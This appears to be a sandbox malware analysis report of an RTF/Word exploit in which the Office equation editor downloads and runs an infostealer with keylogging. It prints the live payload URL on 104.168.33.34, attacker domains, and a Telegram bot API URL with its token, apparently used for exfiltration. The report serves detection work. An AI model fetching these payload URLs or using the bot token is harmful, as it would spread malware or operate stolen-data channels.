Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.34

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 8_2_0361062C LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,

8_2_0361062C

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{16921AF3-62CF-4133-BF32-5AC9DABD1716}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /u7xc HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: wbze.deConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /u7xc HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: wbze.deConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xampp/rzz/rz/beautifulanimakingsayingshewasreallybeautifultogofromtheentirekingdomtounderstandhowmuchsheloved___herlandandhusbandsheisgood.doc HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 104.168.33.34Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /5457/html.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.33.34Connection: Keep-Alive

Source: html.exe, 0000000A.00000002.656986808.0000000005AC0000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005A8D000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: wbze.de
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 06 May 2024 12:59:13 GMTServer: Apache/2.4.38 (Debian)X-Powered-By: ExpressContent-Security-Policy: default-src 'none'X-Content-Type-Options: nosniffContent-Type: text/html; charset=utf-8Content-Length: 144Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 06 May 2024 12:59:14 GMTServer: Apache/2.4.38 (Debian)X-Powered-By: ExpressContent-Security-Policy: default-src 'none'X-Content-Type-Options: nosniffContent-Type: text/html; charset=utf-8Content-Length: 144Connection: close

Source: EQNEDT32.EXE, 00000008.00000002.381980633.000000000067E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://104.168.33.34/5457/html.exe
Source: EQNEDT32.EXE, 00000008.00000002.381980633.000000000067E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://104.168.33.34/5457/html.exeiiC:
Source: EQNEDT32.EXE, 00000008.00000002.382092711.0000000003610000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://104.168.33.34/5457/html.exej
Source: rz on 104.168.33.34.url.0.dr	String found in binary or memory: http://104.168.33.34/xampp/rzz/rz/
Source: html.exe, 0000000A.00000002.656186717.000000000293B000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455352786.00000000023AC000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 00000010.00000002.656194441.000000000249C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org
Source: html.exe, 0000000A.00000002.656986808.0000000005AEC000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005AAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: html.exe, 0000000A.00000002.656986808.0000000005AC0000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005A8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: html.exe, 0000000A.00000002.656986808.0000000005AC0000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005A8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: html.exe, 0000000A.00000002.656986808.0000000005AC0000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005A8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: html.exe, 0000000A.00000002.656986808.0000000005AEC000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005AAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: html.exe, 0000000A.00000002.656986808.0000000005AC0000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005A8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: html.exe, 0000000A.00000002.656986808.0000000005AC0000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005A8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: html.exe, 0000000A.00000002.656986808.0000000005AC0000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005A8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: html.exe, 0000000A.00000002.656986808.0000000005AC0000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005A8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: html.exe, 0000000A.00000002.656986808.0000000005AC0000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005A8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: html.exe, 0000000A.00000002.656986808.0000000005AC0000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005A8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: html.exe, 0000000A.00000002.656986808.0000000005AC0000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005A8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: html.exe, 0000000A.00000002.656986808.0000000005AC0000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005A8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: html.exe, 0000000A.00000002.656986808.0000000005AC0000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005A8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: html.exe, 0000000A.00000002.656186717.0000000002881000.00000004.00000800.00020000.00000000.sdmp, html.exe, 0000000A.00000002.656186717.000000000291E000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455352786.00000000022F1000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455352786.000000000238E000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 00000010.00000002.656194441.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 00000010.00000002.656194441.0000000002476000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: mpTrle.exe.10.dr, html.exe.8.dr, html[1].exe.8.dr	String found in binary or memory: http://tempuri.org/DataSet1.xsd)Microsoft
Source: u7xc.url.0.dr	String found in binary or memory: http://wbze.de/u7xc
Source: html.exe, 0000000A.00000002.656986808.0000000005AC0000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005A8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: html.exe, 0000000A.00000002.656986808.0000000005AC0000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005A8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: html.exe, 00000009.00000002.399205246.0000000003B1A000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.452977021.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: html.exe, 0000000A.00000002.656186717.0000000002932000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455352786.000000000238E000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 00000010.00000002.656194441.0000000002476000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipif8
Source: html.exe, 00000009.00000002.399205246.0000000003B1A000.00000004.00000800.00020000.00000000.sdmp, html.exe, 0000000A.00000002.656186717.0000000002881000.00000004.00000800.00020000.00000000.sdmp, html.exe, 0000000A.00000002.656186717.000000000291E000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455352786.00000000022F1000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.452977021.0000000000402000.00000040.00000400.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455352786.000000000238E000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 00000010.00000002.656194441.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 00000010.00000002.656194441.0000000002476000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: html.exe, 0000000A.00000002.656186717.0000000002881000.00000004.00000800.00020000.00000000.sdmp, html.exe, 0000000A.00000002.656186717.000000000291E000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455352786.00000000022F1000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455352786.000000000238E000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 00000010.00000002.656194441.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 00000010.00000002.656194441.0000000002476000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: mpTrle.exe, 0000000C.00000002.455352786.000000000238E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/T0
Source: html.exe, 0000000A.00000002.656186717.000000000291E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/TX
Source: mpTrle.exe, 00000010.00000002.656194441.0000000002476000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/Tb
Source: html.exe, 0000000A.00000002.656186717.000000000291E000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455352786.000000000238E000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 00000010.00000002.656194441.0000000002476000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/p
Source: html.exe, 0000000A.00000002.656186717.0000000002881000.00000004.00000800.00020000.00000000.sdmp, html.exe, 0000000A.00000002.656186717.000000000291E000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455352786.00000000022F1000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455352786.000000000238E000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 00000010.00000002.656194441.0000000002476000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t
Source: html.exe, 00000009.00000002.399205246.0000000003B1A000.00000004.00000800.00020000.00000000.sdmp, html.exe, 0000000A.00000002.656186717.0000000002881000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455352786.00000000022F1000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.452977021.0000000000402000.00000040.00000400.00020000.00000000.sdmp, mpTrle.exe, 00000010.00000002.656194441.00000000023D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6981982105:AAGJZG7U4ELI-QLExHS4a6AlsLp__P5_opc/
Source: html.exe, 0000000A.00000002.656986808.0000000005AC0000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005A8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: u7xc[1].htm.0.dr	String found in binary or memory: https://wbze.de/u7xc

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49163
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49174 -> 443

Source: unknown	HTTPS traffic detected: 109.71.253.25:443 -> 192.168.2.22:49169 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.22:49173 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.22:49174 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 9.2.html.exe.3b55730.9.raw.unpack, cPKWk.cs	.Net Code: _00jhmIFO
Source: 9.2.html.exe.3b1a710.10.raw.unpack, cPKWk.cs	.Net Code: _00jhmIFO

System Summary

Malicious sample detected (through community Yara rule)

Source: 9.2.html.exe.3b1a710.10.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.html.exe.3b55730.9.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 12.2.mpTrle.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.html.exe.3b55730.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.html.exe.3b1a710.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\beautifulanimakingsayingshewasreallybeautifultogofromtheentirekingdomtounderstandhowmuchsheloved___herlandandhusbandsheisgood[1].doc, type: DROPPED	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\48255FE9.doc, type: DROPPED	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen

Microsoft Office drops suspicious files

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\u7xc.url			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\rz on 104.168.33.34.url			Jump to behavior

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\html[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\html.exe			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Memory allocated: 770B0000 page execute and read and write

Source: C:\Users\user\AppData\Roaming\html.exe	Code function: 9_2_0025A400	9_2_0025A400
Source: C:\Users\user\AppData\Roaming\html.exe	Code function: 9_2_002504D8	9_2_002504D8
Source: C:\Users\user\AppData\Roaming\html.exe	Code function: 9_2_002567A0	9_2_002567A0
Source: C:\Users\user\AppData\Roaming\html.exe	Code function: 9_2_0025F150	9_2_0025F150
Source: C:\Users\user\AppData\Roaming\html.exe	Code function: 9_2_002511C0	9_2_002511C0
Source: C:\Users\user\AppData\Roaming\html.exe	Code function: 9_2_0025DA2F	9_2_0025DA2F
Source: C:\Users\user\AppData\Roaming\html.exe	Code function: 9_2_0025CA28	9_2_0025CA28
Source: C:\Users\user\AppData\Roaming\html.exe	Code function: 9_2_0025E2C0	9_2_0025E2C0
Source: C:\Users\user\AppData\Roaming\html.exe	Code function: 9_2_0025ED18	9_2_0025ED18
Source: C:\Users\user\AppData\Roaming\html.exe	Code function: 9_2_002545BA	9_2_002545BA
Source: C:\Users\user\AppData\Roaming\html.exe	Code function: 9_2_0025DE88	9_2_0025DE88
Source: C:\Users\user\AppData\Roaming\html.exe	Code function: 9_2_0025678F	9_2_0025678F
Source: C:\Users\user\AppData\Roaming\html.exe	Code function: 9_2_00D30040	9_2_00D30040
Source: C:\Users\user\AppData\Roaming\html.exe	Code function: 9_2_00D36E08	9_2_00D36E08
Source: C:\Users\user\AppData\Roaming\html.exe	Code function: 9_2_00D3A708	9_2_00D3A708
Source: C:\Users\user\AppData\Roaming\html.exe	Code function: 10_2_002E38F0	10_2_002E38F0
Source: C:\Users\user\AppData\Roaming\html.exe	Code function: 10_2_002E9350	10_2_002E9350
Source: C:\Users\user\AppData\Roaming\html.exe	Code function: 10_2_002E4508	10_2_002E4508
Source: C:\Users\user\AppData\Roaming\html.exe	Code function: 10_2_002E8EF0	10_2_002E8EF0
Source: C:\Users\user\AppData\Roaming\html.exe	Code function: 10_2_002EC78B	10_2_002EC78B
Source: C:\Users\user\AppData\Roaming\html.exe	Code function: 10_2_002E3C38	10_2_002E3C38
Source: C:\Users\user\AppData\Roaming\html.exe	Code function: 10_2_002EC6A0	10_2_002EC6A0
Source: C:\Users\user\AppData\Roaming\html.exe	Code function: 10_2_00820040	10_2_00820040
Source: C:\Users\user\AppData\Roaming\html.exe	Code function: 10_2_00827178	10_2_00827178
Source: C:\Users\user\AppData\Roaming\html.exe	Code function: 10_2_00826219	10_2_00826219
Source: C:\Users\user\AppData\Roaming\html.exe	Code function: 10_2_00822668	10_2_00822668
Source: C:\Users\user\AppData\Roaming\html.exe	Code function: 10_2_008293A0	10_2_008293A0
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 11_2_0025A400	11_2_0025A400
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 11_2_002504D8	11_2_002504D8
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 11_2_002567A0	11_2_002567A0
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 11_2_0025F141	11_2_0025F141
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 11_2_0025F150	11_2_0025F150
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 11_2_002511C0	11_2_002511C0
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 11_2_0025DA2F	11_2_0025DA2F
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 11_2_0025CA28	11_2_0025CA28
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 11_2_0025E2C0	11_2_0025E2C0
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 11_2_0025ED18	11_2_0025ED18
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 11_2_0025DE88	11_2_0025DE88
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 11_2_0025678F	11_2_0025678F
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 11_2_041D6E08	11_2_041D6E08
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 11_2_041D0006	11_2_041D0006
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 11_2_041D0040	11_2_041D0040
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 11_2_041DA708	11_2_041DA708
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 12_2_003638F0	12_2_003638F0
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 12_2_0036C2C8	12_2_0036C2C8
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 12_2_00364508	12_2_00364508
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 12_2_0036F6A8	12_2_0036F6A8
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 12_2_00368F78	12_2_00368F78
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 12_2_0036E9B8	12_2_0036E9B8
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 12_2_00363C38	12_2_00363C38
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 12_2_0036F7CF	12_2_0036F7CF
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 12_2_008B68A8	12_2_008B68A8
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 12_2_008B5948	12_2_008B5948
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 12_2_008B1D98	12_2_008B1D98
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 12_2_008B8AD0	12_2_008B8AD0
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 12_2_0036C678	12_2_0036C678
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 14_2_0038A400	14_2_0038A400
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 14_2_003804D8	14_2_003804D8
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 14_2_003867A0	14_2_003867A0
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 14_2_0038F150	14_2_0038F150
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 14_2_0038F141	14_2_0038F141
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 14_2_003811C0	14_2_003811C0
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 14_2_0038CA28	14_2_0038CA28
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 14_2_0038DA2F	14_2_0038DA2F
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 14_2_0038CA19	14_2_0038CA19
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 14_2_0038E2C0	14_2_0038E2C0
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 14_2_0038ED18	14_2_0038ED18
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 14_2_0038DE88	14_2_0038DE88
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 14_2_0038678F	14_2_0038678F
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 14_2_047E0040	14_2_047E0040
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 14_2_047E6E08	14_2_047E6E08
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 14_2_047E0007	14_2_047E0007
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 14_2_047EA708	14_2_047EA708
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 16_2_003938F0	16_2_003938F0
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 16_2_0039F260	16_2_0039F260
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 16_2_00398B30	16_2_00398B30
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 16_2_00394508	16_2_00394508
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 16_2_0039BE80	16_2_0039BE80
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 16_2_00393C38	16_2_00393C38
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 16_2_0039E572	16_2_0039E572
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 16_2_00456548	16_2_00456548
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 16_2_004555E9	16_2_004555E9
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 16_2_00451638	16_2_00451638
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 16_2_00458770	16_2_00458770
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Code function: 16_2_0039C230	16_2_0039C230

Source: ~WRF{1CB57AA5-D007-49F8-8F70-7D791EC5AD43}.tmp.0.dr

